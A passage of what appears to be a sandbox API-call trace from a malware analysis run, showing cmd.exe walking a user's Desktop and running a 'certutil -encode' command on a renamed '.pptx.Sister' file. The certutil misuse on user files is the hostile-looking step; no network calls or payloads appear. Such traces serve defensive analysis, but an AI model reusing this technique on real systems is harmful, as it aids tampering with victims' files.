lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1360, dwThreadId=0x1274)) returned 1 [0282.578] CloseHandle (hObject=0xa8) returned 1 [0282.578] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0282.578] GetProcessHeap () returned 0x21ed8c70000 [0282.578] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60c10) returned 1 [0282.578] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0282.578] GetProcessHeap () returned 0x21ed8c70000 [0282.578] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0282.579] FreeEnvironmentStringsA (penv="=") returned 1 [0282.579] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0284.612] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0284.612] CloseHandle (hObject=0xa4) returned 1 [0284.612] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0284.612] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0284.612] GetProcessHeap () returned 0x21ed8c70000 [0284.612] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0284.612] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0284.612] GetProcessHeap () returned 0x21ed8c70000 [0284.612] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0284.612] FreeEnvironmentStringsA (penv="=") returned 1 [0284.612] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0284.612] GetProcessHeap () returned 0x21ed8c70000 [0284.613] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0284.613] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0284.613] GetProcessHeap () returned 0x21ed8c70000 [0284.613] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0284.613] FreeEnvironmentStringsA (penv="=") returned 1 [0284.613] GetProcessHeap () returned 0x21ed8c70000 [0284.613] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c955c0) returned 1 [0284.613] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0284.613] ??_V@YAXPEAX@Z () returned 0x1 [0284.613] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="_zyi016uyI EccZobgM.pptx.Sister", cAlternateFileName="")) returned 1 [0284.613] GetProcessHeap () returned 0x21ed8c70000 [0284.613] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61760, Size=0x74c) returned 0x21ed8d60c10 [0284.613] GetProcessHeap () returned 0x21ed8c70000 [0284.613] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60c10) returned 0x74c [0284.614] GetProcessHeap () returned 0x21ed8c70000 [0284.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a8a0 [0284.614] GetProcessHeap () returned 0x21ed8c70000 [0284.614] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a8a0, Size=0x58) returned 0x21ed8d2a8a0 [0284.614] GetProcessHeap () returned 0x21ed8c70000 [0284.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a8a0) returned 0x58 [0284.614] GetProcessHeap () returned 0x21ed8c70000 [0284.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a910 [0284.614] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0284.614] GetProcessHeap () returned 0x21ed8c70000 [0284.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7cc40 [0284.614] ??_V@YAXPEAX@Z () returned 0x1 [0284.614] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0284.614] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0284.615] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0284.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0284.615] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0284.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3d7f334, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd3d7f334, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ce20 [0284.615] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0284.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="_zyi016uyI EccZobgM.pptx.Sister", cAlternateFileName="_ZYI01~1.SIS")) returned 0x21ed8c7cdc0 [0284.616] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0284.616] _wcsnicmp (_String1="_ZYI01~1.SIS", _String2="_zyi016uyI EccZobgM.pptx.Sister", _MaxCount=0x1f) returned 72 [0284.616] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0284.616] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0284.616] GetProcessHeap () returned 0x21ed8c70000 [0284.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8cc7970 [0284.616] ??_V@YAXPEAX@Z () returned 0x1 [0284.616] ??_V@YAXPEAX@Z () returned 0x1 [0284.616] GetProcessHeap () returned 0x21ed8c70000 [0284.616] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a910, Size=0x270) returned 0x21ed8d2a910 [0284.616] GetProcessHeap () returned 0x21ed8c70000 [0284.616] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a910) returned 0x270 [0284.616] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0284.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0284.616] GetFileType (hFile=0x50) returned 0x2 [0284.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.616] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0284.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0284.713] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0284.831] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.831] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0284.832] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0284.832] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0284.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0284.832] GetFileType (hFile=0x50) returned 0x2 [0284.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.832] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0284.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0284.901] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0285.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.013] GetFileType (hFile=0x50) returned 0x2 [0285.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0285.013] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0285.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.101] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a8b0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a8b0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0285.171] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\" ") returned 76 [0285.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.171] GetFileType (hFile=0x50) returned 0x2 [0285.171] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0285.171] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0285.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.248] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0285.353] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0285.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.353] GetFileType (hFile=0x50) returned 0x2 [0285.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0285.353] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0285.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.438] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0285.586] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0285.673] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0285.673] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0285.673] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0285.673] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0285.673] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0285.673] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0285.673] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0285.673] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0285.673] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0285.673] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0285.673] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0285.673] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0285.673] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0285.673] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0285.673] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0285.673] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0285.673] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0285.673] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0285.673] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0285.673] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0285.673] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0285.673] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0285.674] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0285.674] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0285.674] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0285.674] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0285.674] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0285.674] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0285.674] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0285.674] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0285.674] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0285.674] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0285.674] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0285.674] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0285.674] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0285.674] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0285.674] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0285.674] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0285.674] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0285.674] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0285.674] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0285.674] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0285.674] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0285.674] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0285.674] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0285.674] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0285.674] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0285.674] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0285.674] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0285.674] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0285.674] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0285.674] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0285.674] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0285.674] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0285.674] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0285.675] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0285.675] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0285.675] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0285.675] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0285.675] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0285.675] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0285.675] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0285.675] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0285.675] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0285.675] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0285.675] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0285.675] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0285.675] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0285.675] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0285.675] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0285.675] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0285.675] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0285.675] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0285.675] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0285.675] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0285.675] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0285.675] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0285.675] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0285.675] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0285.675] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0285.675] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0285.675] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0285.675] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0285.675] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0285.676] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0285.676] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0285.676] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0285.676] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0285.676] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0285.676] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0285.676] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0285.676] ??_V@YAXPEAX@Z () returned 0x1 [0285.676] GetProcessHeap () returned 0x21ed8c70000 [0285.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94410c0 [0285.676] GetProcessHeap () returned 0x21ed8c70000 [0285.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed92a0db0 [0285.676] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0285.676] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0285.676] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0285.676] GetProcessHeap () returned 0x21ed8c70000 [0285.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed94510b0 [0285.678] SetErrorMode (uMode=0x0) returned 0x0 [0285.678] SetErrorMode (uMode=0x1) returned 0x0 [0285.678] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed94510c0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0285.678] SetErrorMode (uMode=0x0) returned 0x1 [0285.678] GetProcessHeap () returned 0x21ed8c70000 [0285.678] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94510b0, Size=0x52) returned 0x21ed94510b0 [0285.678] GetProcessHeap () returned 0x21ed8c70000 [0285.678] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94510b0) returned 0x52 [0285.679] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0285.679] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937cb00 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d44830 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44830, Size=0x1be) returned 0x21ed8d44830 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44830) returned 0x1be [0285.679] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d61f10 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61f10, Size=0x7e) returned 0x21ed8d61f10 [0285.679] GetProcessHeap () returned 0x21ed8c70000 [0285.679] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61f10) returned 0x7e [0285.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.680] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0285.680] GetLastError () returned 0x2 [0285.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.680] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0285.680] GetLastError () returned 0x2 [0285.680] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.681] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0285.681] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0285.681] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0285.681] GetLastError () returned 0x2 [0285.681] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0285.681] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0285.681] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.681] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.681] ??_V@YAXPEAX@Z () returned 0x1 [0285.682] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0285.810] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0285.811] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0285.811] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0285.811] GetProcessHeap () returned 0x21ed8c70000 [0285.811] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bc0 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 